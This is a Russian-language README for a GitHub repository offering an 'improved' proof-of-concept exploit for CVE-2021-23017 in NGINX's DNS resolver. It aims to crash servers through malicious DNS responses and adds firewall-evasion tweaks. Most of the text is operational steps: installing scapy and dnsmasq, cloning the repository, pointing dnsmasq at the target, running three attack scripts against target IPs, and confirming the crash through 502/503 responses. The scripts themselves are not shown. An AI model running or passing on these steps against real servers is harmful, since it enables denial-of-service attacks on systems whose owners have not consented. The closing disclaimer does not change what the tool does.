
уязвимость в серверах NGINX (версии 0.6.18–1.20.0). Скрипты предназначены для вызова отказа в обслуживании (DoS) путем отправки вредоносных DNS-ответов с улучшениями для обхода брандмауэров.
уязвимость в серверах NGINX (версии 0.6.18–1.20.0). Скрипты предназначены для вызова отказа в обслуживании (DoS) путём отправки вредоносных DNS-ответов с улучшениями для обхода брандмауэров. Это улучшенная версия оригинального PoC из M507/CVE-2021-23017-PoC.
Предупреждение: Используйте только с явного письменного разрешения владельца системы. Несанкционированное тестирование незаконно.
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) для аварийного завершения сервера NGINX.curl и dig для эксплуатации уязвимости.По сравнению с M507/CVE-2021-23017-PoC:
poc1.2.3.py для одновременного сниффинга, отправки DNS и запуска запросов. Три скрипта необходимо запускать вместе.Запустите три скрипта вместе с соответствующими аргументами (замените <target_ip>, <your_dns_server_ip>, <target_url>).
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (Рекомендуется)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
Проверьте статус сервера:
curl -I http://<target_url>
502 Bad Gateway или 503 Service Unavailable указывает на аварийное завершение сервера.200 OK говорит об отсутствии уязвимости или блокировке брандмауэром.Отслеживайте DNS-трафик:
sudo wireshark -f "udp port 53"
Отказ от ответственности: Только для образовательных целей. Авторы не несут ответственности за неправомерное использование.